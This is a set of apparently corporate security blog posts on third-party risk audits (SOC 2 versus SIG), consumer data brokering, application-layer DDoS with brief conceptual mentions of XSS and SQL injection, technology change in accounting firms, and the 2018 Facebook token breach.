TPRM, otherwise known as Third Party Risk Management, is a critical component of your organization’s security posture. It is a big focal point for regulators and we are even increasingly forced to consider fourth party risk management…the vendors of your vendors.
TPRM is a toolset to identify, assess, mitigate, and respond to third-party vendor risks across the engagement life cycle. A TPRM program is essential to reducing the likelihood and impact of data breach costs, operational failures, vendor bankruptcy, and reputational damage. Although your organization may rely on third-party service providers, your management team remains liable for maintaining an effective internal control system. For example, broker dealer regulator FINRA has a litany of enforcement actions against firms that did not provide adequate oversight of their third-party vendors. No one remembers the name of the HVAC vendor that led to the Home Depot hack, but everyone remembers Home Depot was breached.
Outsourcing has become increasingly important as business operations have become increasingly complex….less exciting is the ownership of this third-party responsibility.
If your organization sells technology services, customers and potential clients have probably requested a SOC 2 document or a Service and Organization Control 2 report. A SOC can only be prepared by a CPA firm with qualified technology systems auditors and its value derives from an independent third-party certifying the design of your organization’s security controls (SOC 2 Type I) and the operation of those controls (SOC 2 Type II). It isn’t just that your organization says it has adequate security controls, your organization must prove it does to an independent auditor.
Developed by the AICPA (American Institute of Certified Public Accountants), SOC 2 is specifically designed for service providers storing customer data in the cloud. That means SOC 2 applies to nearly every SaaS organization, as well as any organization that uses the cloud to store its customers’ information. So, what does SOC 2 require exactly? It’s considered a technical audit, but it goes beyond that. SOC 2 requires organizations to establish and follow strict information security policies and procedures, encompassing the security, availability, processing, integrity, and confidentiality of customer data. SOC 2 ensures that an organization’s security measures are in line with the unique parameters of today’s cloud requirements.
In practice, there are four critical areas to SOC 2 compliance:
SOC 2 compliance centers on implementing and maintaining well defined long-term security policies, procedures, and practices.
While SOC 2 is the most requested TPRM document, the largest standards group and professional association for TPRM is the Shared Assessments Organization. Shared Assessments provides a wide array of products and services, including the well-known Standard Information Gathering (SIG) questionnaire, professional certification in third-party risk management (Certified Third Party Risk Professional), Vendor Risk Management Maturity Model (VRMMM) and Agreed Upon Procedures (AUP).
SIG is a comprehensive 1500 questionnaire that is completed and certified by an independent security professional, who evaluates and reports on the design and operation of an organization’s security controls. While that objective crosses with that of the SOC 2, the SIG is significantly different than SOC 2. The SIG, or Standard Information Gathering questionnaire, is a holistic tool for risk management assessments of cybersecurity, IT, privacy, data security and business resiliency. It evaluates third-party vendors based on its fifteen individual “domains” by gathering pertinent information to determine how security risks are managed.
These domains include:
If 1500 questions seems insurmountable, there’s a slim version called SIG Lite. As the name depicts, it’s SIG on a diet (but with over 350 questions, still a full meal), but covers all of the aforementioned domains and achieves its goal with less questions.
To SIG or to SOC?
Now that you know about the 2 prominent players in the TPRM game, let’s discuss which one may be a better fit for your organization and supportive reasons.
If one of your clients has asked for a SOC 2 document and your organization has gone through the process, then I send my condolences and completely understand your earlier deep sigh. SOC 2 is extremely expensive and can easily go into six figures, very complex and resource intensive, and outside of compliance requirements, it can be a challenging report to interpret. The cost, complexity, and resource drain are all significant barriers for SMBs to complete a SOC 2 audit. If your organization is an SMB and contractually obligated to provide a SOC 2 document, your organization has no choice but to bite the bullet. If not, SIG compliance can be a vastly less expensive alternative, far more useful to your organization, and more valuable to your customers as well.
Reasons for the SIG:
1. Cost for Compliance: SIG is already written, whereas the audit underlying a SOC 2 document is specific to the organization. Therefore, time spent on-site for the review is reduced significantly because an independent auditor can specify in advance the evidence that he or she will require.
2. Resource Constraints: Completing a SIG questionnaire typically should require 3-5 days, while a SOC 2 can require several weeks at the minimum on-site.
3. Narrow vs. Broad: SOC 2 audit can become very narrowly scoped relative to SIG. As previously mentioned, SOC 2 is a rigorous audit process created and maintained by accountants and focuses on technology systems that directly interact with clients’ data. SIG on the other hand provides a more holistic view of your organization’s technology stack.
4. More informative: SIG includes detailed information about sample sizes, testing methodology, and attributes considered. A client can easily glean from your SIG report that your organization has a definitive process for detecting unauthorized wireless networks, evidence the process is being utilized, whether any unauthorized wireless networks were detected in the previous six months and, if so, whether they were removed. This level of detail and granularity is not included in a SOC 2 report.
While a SOC 2 is the gold standard for third party attestation, does your organization even need it? Your organization may not be legally required to complete and maintain a SOC 2 document, but your clients are certainly entitled to put a policy in place requiring it of any of its vendors. You’re in the business of keeping your clients and growing a list of them, not losing them. As far as deciding which audit your organization must complete, let’s start with some suggestions on answering that question. The first step is to ask questions of your client to discover what they are specifically interested in. Do they want to know that your email system is secure, your file storage, your file transfer, or something else? Your client surely knows its peers in its space; don’t be bashful to ask what their peers utilize for auditing purposes. If you get a deer in the headlights look, then don’t be surprised. Most of your clients won’t truly know and understand what specific audit information is required for themselves, let alone their peers. Armed with knowledge from information here, you can easily control the direction of this conversation.
If non public personal information is at issue and your client is heavily regulated (e.g. large finance or healthcare entity), your client may be simply passing on the message and your organization will likely require a SOC 2 document. If not, then probe and understand your client’s needs. Recently, an information security officer at a large bulge bracket broker dealer insisted that a client agree to provide a SOC 2 …upon doing research, we learned that the same firm had been involved in the creation the Shared Assessments framework (along with the Big Four…did I mention that?). SOC 2 was dropped from the discussion and replaced with the SIG. My point is simply don’t roll over for a SOC 2 requirement if it is not truly required. If you push for the SIG, you are providing a compelling alternative versus not addressing your client’s concern. In short, in many cases, the SOC or SSAE 16/18 is simply the wrong sized requirement. The SIG at 1500 questions is no layup either, but either the SIG or the SIG Lite may be better suited to everyone’s needs.
In many cases, the SIG is not only less expensive and resource intensive, but also more useful, and is a better means of communicating the real information that your clients need, your organization’s security posture.
The only professionals that can decide the “best” audit process for your organization is you and your team. The decision will be obviously be dictated by the requirements of your customer base. The decision process can be augmented by a security service provider to gather your requirements and advise on your specific needs and the best fit for your organization’s auditing needs.
Before technology took over our lives and data started growing exponentially, the U.S. Postal Service was “the” Big Data processor and repository in North America and perhaps the world. To state that it is an institution of American life is obvious to the point of absurdity. While not known for its clockwork efficiency, we all continue to rely on it in one way or another. If you’ve seen the news recently, you may have felt that gnawing pang of having your privacy yet again violated as the USPS publicly disclosed a vulnerability that allowed anyone to view, alter and store information about its 60 million users. Before you go log into your USPS account that you created to manage the delivery attempts of that important package you missed, it’s best to understand the bigger issue at hand: your data, its value and how exposure by the entities that are engrained in our lives and businesses on can expose us in ways we don’t normally contemplate….and would prefer to not have to worry about at all.
The reality is that your digital footprint are being watched—with the resulting aggregation of data providing a frightening wealth of information about our lives and businesses. Despite seeing the news, hacks, data breaches and massive data exposures, you still scroll through the Terms of Service (ToS) of the new app you just downloaded to get to the “Agree” button. I mean, what are the alternatives, right? App creators know better than to bold anything or make anything clear — especially about how your app usage will translate into marketing metadata, sprinkling a trail behind you. They don’t want anything to stand between you and your download — or them and your personal information. You want to ignore this and spend time focus time on more productive endeavors…but there’s that little voice inside your head telling you that this will come back to you in one form or another and it is getting louder.
Your Google searches return, zombie-like, as ads. Your emails are mined for money-making opportunities. Elsewhere, your background, politics and even ethnicity are tracked. Retailers are notified, via Bluetooth and GPS, when you enter their store what your self-reported income range or demographic likely is and how much time you’ll probably spend shopping. The irony is that Americans say they care deeply about protecting their data. A recent survey shows that being in control of who can get information about us is “very important” to 74% of Americans. But if we care so much, why do we keep giving our information away? It’s the “privacy paradox”: we do it because we tell ourselves that our future self will probably suffer no consequences. We conclude that the worst that will likely happen is we feel kind of violated by all the corporate algorithms tracking us along with everyone else. Tech companies find their opening in our short-term reasoning and our future self cannot stop us from clicking on “Agree”.
A lucrative market has emerged in mining your data for presumably legitimate business reasons and for your convenience. The data broker industry alone generates around $200bn in annual revenue – which cuts out the data subjects … the data is about. ZDNet has detailed how all four major US carriers sell our mobile location data to companies you’ve never heard of, without your explicit permission. For example, Securus buys geolocation data from a location aggregator called LocationSmart, which in turn buys it from the aforementioned telecoms. All of these corporate relationships are arguably legal. That alone should be cause for concern because there’s no opt-out for any of this location sharing. Your consent automatically occurs simply by having a cell phone plan. In a very real sense, you’re powerless to prevent your location being used for profit and against you.
What is this all data collection called? You guessed it, Big Data. Big Data brings big benefits: ads focused on what you actually want to buy, smart cars that can help you avoid collisions or call for an ambulance if you happen to get in one anyway, wearable or implantable devices that can monitor your health and notify your doctor if something is going wrong. Big Data also leads to big privacy problems, especially when the corporations, which we entrust by clicking Agree, expose our data.
This not an anti-business viewpoint. If you think about it, it goes to the heart of our trusted networks and communications with one another. If these networks and communications are compromised by our own carelessness and the carelessness of others, what does this do to our society and how we engage with one another? How much damage could this do to the potential for legitimate uses of Big Data in our lives and businesses?
Corporate Data Collection and What You Don’t Realize
How much do companies really know about you? They start with the basics, like your name, address and contact information, and add on demographics, like age, race, occupation and education.
But that's just the beginning because companies collect lists of people experiencing "life-event triggers" so if you’re getting married, buying a home, sending a kid to college—or even getting divorced, you pop up on some company’s radar. For example, Experian, the credit reporting agency, has a separate marketing services division, which sells lists of names of expecting parents and families with newborns. Companies also collect data about your hobbies and many of the purchases you make. Enjoy reading nonfiction about World War II? Epsilon will sell a list containing your information to companies looking for potential book buyers. Another credit reporting agency, Equifax, has a subsidiary that collects detailed salary and pay stub information on roughly 40% of employed Americans. Do you enjoy the perks from your store loyalty cards? Great, but there’s a company called Datalogix, which has information on more than $1 trillion in consumer spending across 1400+ leading brands. Confused how the Internet knows about the classic car you bought in cash 5 years ago? You may be surprised to know that your state’s DMV may sell personal information— like your name, address, and vehicles you own to companies.
Despite protections around your medical records, companies like Axciom capture information about your interests in certain health conditions based on what you buy—or what you search for online. It has lists of people classified as allergy sufferers and dieters and sells lists of individuals that have a propensity to do online searches for a certain ailment or prescription.
These companies and other companies like them aggregate and sell your online presence as well. These companies collect the information you post online, your screen names, website addresses, interests, hometown and professional history, and how many friends or followers you have. Acxiom collects information about which social media sites individual people use, whether they are a heavy or a light online user and resells it to others. To give you the massive scale of a company like Acxiom, it has information on 500 million people worldwide, including nearly every U.S. consumer.
Why does this matter to you?
There is a refined, in depth and legitimately acquired database of sensitive information about you and your business collected by organizations both with and without your consent. Further, their use of your information and ability to share that information is largely unregulated. Since your sensitive information is collected, stored and transferred by so many different organizations, imagine the uncountable opportunities for that information to fall into the wrong hands.
As witnessed by the most recent USPS data exposure, sadly you have little control over it. If you have ever traveled for business or pleasure, you’ve probably stayed at a Marriott property. Similar to USPS, Marriott collects sensitive information about you and unsurprisingly recently discovered an ongoing data breach that revealed over 500 million guest records…for nearly 4 years before discovery. The malicious actors had access to guests’ names, birthdates, passport #s, reservation patterns, and payment card information. Fraudulent charges aside, this information now empowers them to take the information that they have mined to steal or mimic your identity, create more illegal opportunities to monetize personal and corporate account information and cause significant harm. How good are you feeling about clicking “Agree” now?
Do you enjoy a cup of coffee or a tasty donut from Dunkin Donuts? Even Dunkin Donuts, a company serving coffees to millions of people across the globe, had a recent data breach as well. While you may not necessarily be thinking that your coffee drinking patterns are exploitable, they are a piece of your identity that, combined with other information, form part of who you are. Still dubious? Let’s say that you are traveling out of town with a Marriott reservation and buy a coffee from Dunkin Donuts all the while expecting an important holiday season package on your doorstep. A malicious actor could use that information to craft a highly personalized narrative that might enable them to get access to accounts or to convince people within your trusted network that they are you. These, of course, are just a few data points…think about how that data could be used coupled with social engineering or other personalized data. With all this data and advanced machine learning technologies we will soon move beyond dumb identify theft risks, but identity theft with context or highly personalized data theft. A malicious actor armed with a few socially engineered contacts might actually do as good of pulling off your identity to your trusted network as, well, you can. What does that mean? That might mean that the most familiar personal and professional relationships that you maintain – those that are so personal that additional controls seem unnecessary – might be the prime targets of identity theft.
Today, we generally give away our sensitive information knowingly and unknowingly to many organizations with very little thought. We cannot track this information…it is lost and out our control once disclosed. We permit this under the assumption that the organizations requesting this information want to serve our interests (as evidenced by associated revenues), but unfortunately, this information continues to exist in databases in perpetuity and is valuable to malicious actors, who are outsmarting the security staff at organizations you’ve entrusted…perhaps with new technologies that were not even contemplated when you first agreed to the disclosure of your information.
The proper call to action is to become more aware. Information about your life and your business is not valueless. When you give it away to a company, even one that may intend to act in your or your business’s best interests, you are giving away control…control that you may not be able to regain or manage. Guard your personal and commercial sensitive information; don’t be so quick to give it away your name, birthdate and address for that rewards program. Spend more time contemplating both the confidentiality and data security provisions of the agreements that your business enters into. Do not accept that fiction that everyone or every business must forego protections to reap benefits…that fact does little to protect sensitive information once unwittingly disclosed. While we are increasingly getting numb to notices of data breaches, the effects on our futures are real. Rest assured, if you are agreeing to release your sensitive information, whether personal or commercial, it is going to get monetized and more than once. Now ask yourself, how sure are you that it will only get monetized for legitimate reasons and how confident are you that the disclosures you make today will not be improperly exploited by either current or future technologies and malicious actors? The answers you have to those questions should guide how sensitive you are to data disclosure going forward.
As 2018 is on its way out, we reflect on the plethora of massive hacks resulting in endless concern for SMBs & enterprise security professionals as well as the necessary budgetary spend to mitigate and proactively defend against malicious actors. Yes, there’s been a shift in malicious actors’ attack vectors and you are, once again, forced to devote time that you don’t have to address it.
Cisco’s report identifies a concerning shift into more advanced DDoS (Distributed Denial-of-Service) attacks. The DDoS attack vector has been around for decades and has evolved into is a popular inexpensive attack vector for malicious actors. The size, scope and sophistication of these attacks continue to grow at an alarming rate with recent DDoS attacks exceeding one tera byte per second because malicious actors can easily amplify efficacy by purchasing DDoS kits or employing someone to carry out this malicious activity through massive botnets. Generally, DDoS attacks are aimed at large enterprise networks and solely focused on the network stacks' third and fourth layers. However, the alarming shift identified by Cisco this year has been from Layer 3 & 4 DDoS attacks to a totally a more sophisticated DDoS called Application-Layer DDoS attack, which is also known as a Layer 7 DDoS. These attack vectors are hard to detect and even harder to protect against because they tend to be smaller than typical Layer 3 & 4 DDoS attacks and often go unnoticed until it’s too late. Layer 7 DDoS attacks are often referred to as “slow-rate” or “low and slow” attacks, meaning they target applications in a way that they look like actual requests from users until applications become inundated with requests and can no longer respond. In fact, you may even fail to notice an attack until after your front-end application resources are brought offline and connected back-end systems are compromised and/or damaged.
How Does This Affect My SMB?
Layer 3 & 4 DDoS attacks sounds like the stuff that large enterprise networks have to deal with, right? Well...The underlying effectiveness of a DDoS attack comes from the disparity between the amount of resources it takes to launch an attack relative to the amount of resources it takes to absorb or mitigate one. While this is still the case with Layer 7 DDoS attacks, this particular attack does more damage with exponentially less bandwidth. When a user sends a request to into its Gmail account, the amount of data and resources the user’s computer must utilize are minimal and disproportionate to the amount of resources consumed in the process of checking login credentials, loading the relevant user data from a database, and then sending back a response containing the requested webpage. Even in the event of a failed login, a front end application must make database queries or other API calls in order to produce an error webpage. When this disparity is magnified by a botnet targeting a single web application, the effect can easily overwhelm it, resulting in denial-of-service to legitimate traffic.
Sure Eric, you think, I don’t have to worry about numerology and multiple layers except when I am skiing or snow-shoveling (preferably skiiing) because I don’t have a large enterprise network...why does this matter? Layer 7 DDoS attacks have shifted focus to SMBs because of their effectiveness; SMBs don’t have the resources to absorb or mitigate an attack so effectiveness is higher and a successful compromise is equally profitable. Another reason is the proliferation of Mirai variants. Mirai, malware that turns Linux based hosts into remotely controlled "bots" to use within a massive botnet, was originally used by malicious actors to perform Layer 2 and 3 DDoS attacks. Variants of Mirai have fueled DDoS attacks, including a 54-hour barrage against a U.S. college, and aimed squarely at Layer 7.
Since your website, other customer facing applications, and supporting back end resources systems are open interface with users across the globe, they are key targets of Layer 7 DDoS attacks devised to affect the way in which the different systems interoperate. With the development of applications continuing to shift to the cloud, the application layer DDoS attack vector is becoming increasingly more difficult to defend against and mitigate.
With Layer 3 & 4 DDoS attacks, you focus on preserving your network’s bandwidth capacity and identifying network spikes and throttling; the ability to mitigate this type of attack always come down to 1 simple question: who has more network capacity, the attacker or the mitigation service? Successful defense and mitigation of Layer 7 DDoS attacks rely on the ability to accurately profile incoming traffic – to distinguish between humans, bots and hijacked web browsers. As a result, the defense and mitigation processes are much more complex than the attack itself.
Unless a malicious actor(s) has a vendetta against your SMB, a Layer 7 DDoS attack is just the tip of the iceberg. This attack vector is commonly a means to an end, setting the stage for more traditional attack vectors (e.g., exploiting known vulnerabilities, cross site scripting and SQL injection). In this typical scenario, malicious actors use a Layer 7 DDoS to weaken defenses or crash security resources, enabling them to gain access to your network and steal sensitive data for profit.
XSS (Cross-site Scripting)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted websites. This attack vector is through using a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user without validating or encoding it. Yes, your web application is susceptible to malicious activity wherever it receives input from a visitor so any user forms, checkout carts, etc. An attacker uses XSS to send a malicious script or series of instructions to an unsuspecting victim. This particular Layer 7 attack vector is successful in acquiring a victim’s cookies, session tokens, or other sensitive information retained by the browser and used with that site. They can even rewrite the content of a HTML page rendered to a victim.
The basic idea premise behind the SQL injection attack vector is an attacker manipulates data passed into a web application in order to modify the query that is run on the back-end database. This might seem relatively innocuous at first sight, but it can be extremely damaging. The most concerning aspect of this attack vector is that the basic method to query a database inevitably results in a SQL injection vulnerability. And the most common “fix” is to replace each occurrence of a single-quote character with two single-quote characters, effectively “escaping” the single quotes. This unfortunately does not fix the vulnerability or solve the underlying problem. User input validation is necessary throughout your applications to eliminate the ability for malicious actors to use input fields as proxies to perform malicious SQL queries.
Defense & Mitigation
In addition to those technological recommendations, below are additional recommendations you should heed:
In the 90’s, the Internet exploded with the introduction of the web browsers, Apple was a struggling company, Google didn’t have a website while Yahoo was the king of search, and AOL inundated mail slots with CDs to keep its stranglehold on email. In the 2000’s, BlackBerry was king of the smartphone, only to be replaced shortly after Apple’s release of the iPhone and its accompanying App Store. With each decade, we’re encountering unimaginable change; we’ve gone from the desktop web era to the mobile dependency era, and now, the wearables era. While massive changes have been occurring within the Big Four accounting firms, the impact of these changes have, to date, been mitigated for the balance of the accounting profession. The next decade, however, will transform the professional accounting landscape in what many will consider to be unimaginable ways. In twenty years, the accounting profession will be nothing like it does today and along the way, there will be an unprecedented amount of turnover in firms that adapted too little or too late. In short, the profession will be under immense pressure to deliver value for its clients in a manner that adapts to sweeping technological changes.
The sweeping disruption from massive technological change and shifting consumer trends demands a new approach to how the industry creates value for clients and how accounting firms that are small to medium sized businesses (“SMBs”) can compete with the deep resources of the Big Four and emerging large firms. Some accounting offerings are more vulnerable to disruption than others. For example, transactional accounting services have been largely automated by technology; compliance is already undergoing automation and limited advisory services are following the automation trend as well. These automated core offerings require minimal to no oversight, effectively enabling larger accounting firms to leverage their resources to scale with lower operational costs, focus on different customer markets and ultimately, win customers from accounting firms that are SMBs. The impending automation of the accounting professional’s core responsibilities will force accounting firms, large and small, to focus on offering more advice and insight-based service, essentially becoming creative strategy consultants.
There are a number of emerging disruptive technologies that are likely coming up on a more frequent basis during client meetings, accounting conferences or workplace happy hours. Let’s review some of the more common ones and how they will drastically alter the professional accounting landscape:
Big Data thanks to IoT
Big data and IoT are terms that have been loosely thrown around so much that the mention of them is likely to induce a mild sense of nausea at this point. For definition’s sake, however, “big data” is the collection of data sets so large and complex that they cannot be analyzed by traditional databases or tools, such as spreadsheets. IoT is the ever-growing network of physical objects that feature an IP address for internet connectivity, and the communication that occurs between these objects and other Internet-enabled devices and systems.
Big data impacts nearly every aspect of accounting. In audit, big data produces more data driven audits and valuable insights, providing a better experience for the client and the auditor. In advisory services, big data can identify questions, help monitor and improve business performance, and build analytical models that support a variety of product or operational improvements. In tax, big data offers the opportunity to analyze efficiencies more easily, identify tax related opportunities for improvement, and aid in evaluating global opportunities. Lastly, in managerial accounting, big data helps with risk identification and management.
IoT is already impacting consumer’s purchasing frequency with more pay-for-what-you-use models with sensors tracking actual usage. This change in purchasing will require new pricing and accounting models and lead to much larger data profiles of each customer. IoT also impacts business processes like invoicing and reporting. Lastly, IoT will impact the way audits are carried out because the availability of real-time data coming from multiple sources and automated analysis will only increase the need for continuous auditing.
New technologies, based on big data and IoT, are reaching into every area of the business world. The amount of data we are able to collect is rising exponentially, driven by the Internet of Things. Due to IoT, in two years, the number of connected devices will be three times the number of people in the world. Increased connectivity leads to larger data sets and big data gives businesses unprecedented amounts of information and the analytical tools for improved decision-making. In turn, accounting professionals can use these same tools to move from data entry, recordkeeping and simple analysis to strategic business consulting. Today, financial controllers and CFOs use structured data, unstructured data, and predictive analytics to understand massive amounts of customer information, financial trends and industry information to make insightful forecasts for clients.
Artificial Intelligence (AI)
AI is technology that enables computers to perform decision-based tasks previously left to humans. It shows up in multiple forms, including machine-based learning that can progressively become better at analysis and decisions the more it is used, and speech-based technology that can understand different voices and languages. It is largely used to digest and analyze large volumes of data at speeds faster than people can ever accomplish. These technological advances were formerly reserved for science fiction, but artificial intelligence has arrived and is rapidly evolving. Early investments by large firms, including several of the Big Four, have paid off with technology that can substantially slash the amount of time an accountant spends on complex audits and asset estimates. All firms, even small ones, should start thinking about how to adopt advanced technology like artificial intelligence (AI), whether it will be by partnering with specialized AI tech companies or building their own technology department.
In preparation for the oncoming wave of AI within the accounting profession, accounting firms that are SMBs must add, develop and retain staff with database & technology skillsets. A solid foundational understanding of data management and a high comfort level with new technologies will give accounting firms an edge as the use of AI increases in the field. Naturally, the professional skepticism auditors have is necessary to spot when automated analysis goes awry and dealing with exceptions.
If you’re thinking that your accounting firm won’t be able to keep up with the overhead costs of bringing on additional technology staff and developing our own AI products, then don’t fret just yet. AI technology is becoming more accessible and will eventually become standard fare similar to the advent of the Internet. When the World Wide Web was first publicly available, only large companies could afford to establish an online presence and develop their own networks. That has obviously since changed, and today there is scarcely a firm, or person, left unconnected to the web. The same will happen with AI technology and it will become a more necessary and common component of doing business….of course, those who are slightly behind the bleeding edge but ahead of the pack will probably be the best positioned. If you master threading that needle, please let me know ... in the meantime, Helical will continue to build out its AI capabilities.
Cognitive computing and machine learning
Cognitive computing is technology that simulates human thought processes in a computerized model. When it comes to the accounting profession, cognitive computing combines artificial intelligence and machine learning to simplify and transform how professionals find information, how they interact with applications to perform knowledge tasks, and how they make decisions.
When it comes to the accounting profession, cognitive computing will revolutionize the audit process because it can provide assisted decision-making for auditors. This judgment capability involves things like identifying key audit risks and determining how to design audit procedures to respond adequately to those risks. Audit judgment skills are typically developed and refined through years of experience, training, and interaction with colleagues; cognitive computing combines big data and AI to analyze these judgments from across thousands of audits to aid auditors in real time, while keeping client information private. Technology is paramount to your SMB’s future and similarly, your clients’ ability to leverage technology will be equally paramount to their futures. Therefore, an emerging business opportunity for your firm is IT audit, which is necessary for complying with audit standards and possibly your own client’s compliance requirements. Such a service can be readily provided alongside your standard audit offerings. Some firms, like Helical, can even white label these offerings to facilitate the ability of firms to incorporate these capabilities into their own offerings.
Most big accounting firms are investing heavily in emerging technologies. Big Four firm, KPMG, announced an alliance with IBM Watson’s artificial intelligence unit to develop high-tech audit tools, and most all major audit firms have similar initiatives underway. Understandably, accounting firms that are SMBs don’t have access to the capital to make large-scale investments in technologies like cognitive computing. Instead, these firms should look to software providers to incorporate this technology into their offerings so they can capitalize on its abilities. The most important takeaway is to embrace this technological disruption early so your firm can take advantage of the opportunities cognitive computing offers. Being open to this change will ensure that your firm is viable and can compete with the Big Four in the future.
Blockchain is currently the most hyped term you’ll find in any industry because its use case is practically infinite but at its core, its a security and accounting technology for maintaining and transfering ledger information. Since it’s an accounting process, naturally, this is the emerging technology that has the most potential to disrupt the accounting profession.
Blockchain will greatly reduce the costs of maintaining and reconciling ledgers, and will provide absolute certainty over the ownership and history of assets. It facilitate clarity respecting the available resources and obligations of companies, and free up resources to concentrate on planning and valuation, rather than recordkeeping. There are also numerous applications in external audit. Event level audits incorporated into blockchain technology will enhance both the effectiveness and efficiency of those audits and facilitate greater financial transparency.
The move to a financial system with a significant blockchain element offers many opportunities for the accountancy profession. At least initially, most of these opportunities will captured by larger accounting firms which have the resources to devote on the development and implementation of the technology.
As a result, the spectrum of skills represented in accounting profession will change significantly. Some work such as reconciliations and provenance assurance will be reduced or eliminated, while other areas such as technology, advisory, and other value-additive activities will expand. Auditing a company with significant blockchain-based transactions, the focus of the auditor will shift from confirming the accuracy or existence of blockchain transactions with external sources to how those transactions are recorded and recognized in financial statements, and how judgmental elements such as valuations are decided.
It may sound like you should replace your accounting staff with a highly technical staff, but that isn’t necessarily true. Accountants don’t need to be blockchain engineers, but they must learn how to advise on blockchain adoption and consider the impact of blockchain on their businesses and clients. They also must act as the bridge, having informed conversations with both technologists and business stakeholders. Most importantly, an accountant’s skills must expand to include an understanding of the features and functions of blockchain.
Accounting Battleground of the Future
In many ways, the future is now. Technology is causing massive disruption in the accounting industry and the most important factor for the survival of SMB accounting firms is their ability to secure their clients data. Malicious actors have shifted their focus from enterprise companies to SMB because effectiveness is significantly higher and for the level of effort, data theft is equally profitable. Thus, accounting firms that are SMBs have become the biggest targets of malicious actors; trust and confidentiality are paramount in the accounting industry and a data breach is the easiest way to lose clients to the competition. While accounting firms are evolving to incorporate more technological expertise, security of data will be one of the most important variables in the equation of continued existence and competitiveness.
Remaining competitive and preparing for growth requires modernizing your technological acumen and expertise. Most importantly, that technological expertise must incorporate acquiring or retaining security expertise to ensure that your firm remains compliant with evolving confidential and sensitive data security regulations and defending your firm against malicious actors.
The future competitiveness of small to medium sized accounting firms will center around strategic technology partnerships, evolving expertise and the ability to secure the data that such firms process. Those who embrace change will be empowered by it while those who resist or hide from change will be passed by it. For accounting professionals who are trying to make it as small to medium sized firms, their survival has never been more dependent on their ability to embrace change…and there is a lot of it coming!
In 2008, to much fanfare, Facebook introduced a new online platform called Facebook Connect, which was proclaimed as “the” scalable SSO (single sign on) or digital hall pass for the Internet. It has been pitched to companies with a simple proposition: connect to the Facebook platform, and we’ll make it faster and easier for people to use your apps because users are more apt to sign up for new mobile apps and websites if doing so was easier. In one simple click, a Facebook user can log in to any mobile app and website implementing Facebook Connect with their password. It also brought an added measure of security, since users wouldn’t need to create and remember new passwords every time they signed up for a new app. Awesome, where do I sign for this perfect solution right? A technology platform that provides immense convenience and streamlined user experience to your customers and can easily be implemented into your technology stack whether you’re part of a SME or a large enterprise. This “perfect” solution has been adopted by thousands of companies across the global, ranging from SME marketing companies to large enterprises like Airbnb and Uber.
It’s taken 10 years since its inception, but Facebook Connect doesn’t seem so “perfect” after all and perception has changed from an Internet wide single sign on solution to a global single security nightmare.
Over the past few weeks, Facebook announced that first 50 million, then 30 million account entry keys, created via Facebook Connect, had been stolen in the largest hack in the company’s fourteen year history. Since the announcement, companies large and small have been scrambling to determine the possible effects on their customers and networks.
On the surface, 30 million users are barely 3% of Facebook’s total userbase; however, the impact of this hack is exponentially bigger because those stolen entry keys can be used to gain access to so many interconnected mobile apps and websites. Stop for a second and think about how many mobile apps and websites use your Facebook account. If you’ve used all ten digits on your hands, hopefully you get the point. If you don’t have a Facebook account, I applaud you. Stats sayyou’re over 45 years old, you keep a 2018 equivalent of a Motorola flip phone in your back pocket, but you’re still susceptible to the third party risk thanks to your Facebook loving friends who have your email address, phone number and if they are really organized your home & work address in your contact. Let’s not get into email correspondence, chats, essentially any digital communication between you and your Facebook loving friends. This hack and its fallout underscore the lengths to which Facebook has cemented itself as the identity of the internet, and what happens when the security systems of one company — trusted by so many — fail.
Buried within Facebook's recent admission was a surprising revelation for its business customers: Facebook Workplace, used by 30,000 businesses as of a year ago, customers are impacted. If you’re a small/medium enterprise that initially adopted Slack to improve workplace collaboration and efficiency and migrated to Facebook Workplace, then congratulations your company may be exposed to serious third party risk thanks to Facebook. Let’s try to determine whether this particular nugget of the Facebook hack poses any third party risk your company. Back in 2015, Facebook announced that the Royal Bank of Scotland had signed up to use Workplace beta with the intention to roll it out to 100,000 employees. And when Facebook launched the Workplace product in 2016, it said it already had about 1,000 customers using it. During 2015-16, Facebook Workplace allowed employees to link their Workplace account with their personal Facebook account and a stolen account entry key lets you read the files and posts in a Workplace community, which is the equivalent of reading work email.
Below are some easy ways to determine your SME’s risk exposure:
Yes, that’s Facebook fix to its debacle: force users to log out to invalidate the account entry key/token. Simple enough, an inconvenience to Facebook users, but an even easier “fix”. Let’s review Facebook public timeline of this hack and dig a little deeper:
Based on the sophistication of this particular Facebook hack, it’s easy to surmise that the malicious actors were using this exploit long before September 16th and collecting Facebook Connect access tokens. Here’s what really happened:
Facebook has stated that it can’t pinpoint exactly when the malicious actors established the attack chain to exploit 3 separate vulnerabilities, but the vulnerabilities had existed since July 2017. Yikes…
There’s an obvious problem with instructing Facebook Connect users to simply force a log out to “mitigate” this hack. The reality is that Facebook with all its resources has few to no solutions for its Facebook Connect users despite a soon to be released tool that will help SME, and large enterprises alike, identify which accounts may have been tampered with through Facebook Connect. Facebook's handling of user data has been under scrutiny for the better part of this year so this hack couldn’t have come at a worse time for Facebook. Still reeling from a series of scandals that unfolded in the wake of the 2016 US presidential election, a widespread Russian disinformation campaign leveraged the platform unnoticed, followed by revelations that third-party companies like Cambridge Analytica had collected user data without their knowledge. Facebook already faces multiple federal investigations into its privacy and data-sharing practices, including one probe by the Federal Trade Commission and another conducted by the Securities and Exchange Commission. This hack will ramp up efforts to regulate Facebook and other technology companies through financial penalties, legislative efforts or both. In Europe, Facebook could face a fine totaling as much as $1.63 billion if it's found in violation of General Data Protection Regulation (GDPR), the European Union's sweeping consumer privacy law. GDPR contains a provision that companies can be fined 4% of their annual revenue if they violate the law, which encompasses rules on protecting data and a requirement that regulators must be notified within 72 hours of a breach. Ireland's Data Protection Commission, which oversees Facebook under GDPR, is heading up an investigation into the breach.
Facebook’s platform relies on trust: users trust that their pictures will be seen only by those in their networks, their private messages will be read only by the people to whom they were sent. Facebook may look like a juggernaut now, but social networks have fallen before, and surely this is just another data privacy issue just this year. This particular hack destroys trust, the very ingredient that attracts its users, we’ll know quickly about the damage done to Facebook’s brand and its users desire to continue using the social platform or take its “business” elsewhere.
